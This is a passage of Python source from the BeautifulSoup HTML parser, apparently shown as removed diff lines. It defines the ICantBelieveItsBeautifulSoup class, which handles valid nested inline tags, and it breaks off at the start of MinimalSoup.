ICantBelieveItsBeautifulSoup(BeautifulSoup): - - """The BeautifulSoup class is oriented towards skipping over - common HTML errors like unclosed tags. However, sometimes it makes - errors of its own. For instance, consider this fragment: - - FooBar - - This is perfectly valid (if bizarre) HTML. However, the - BeautifulSoup class will implicitly close the first b tag when it - encounters the second 'b'. It will think the author wrote - "FooBar", and didn't close the first 'b' tag, because - there's no real-world reason to bold something that's already - bold. When it encounters '' it will close two more 'b' - tags, for a grand total of three tags closed instead of two. This - can throw off the rest of your document structure. The same is - true of a number of other tags, listed below. - - It's much more common for someone to forget to close a 'b' tag - than to actually use nested 'b' tags, and the BeautifulSoup class - handles the common case. This class handles the not-co-common - case: where you can't believe someone wrote what they did, but - it's valid HTML and BeautifulSoup screwed up by assuming it - wouldn't be.""" - - I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS = \ - ('em', 'big', 'i', 'small', 'tt', 'abbr', 'acronym', 'strong', - 'cite', 'code', 'dfn', 'kbd', 'samp', 'strong', 'var', 'b', - 'big') - - I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS = ('noscript',) - - NESTABLE_TAGS = buildTagMap([], BeautifulSoup.NESTABLE_TAGS, - I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS, - I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS) - -class MinimalSoup(BeautifulSoup): - """The MinimalSoup class is for parsing HTML that contains - pathologically bad markup. It makes no assumptions about tag - nesting, but it does know which tags are self-closing, that -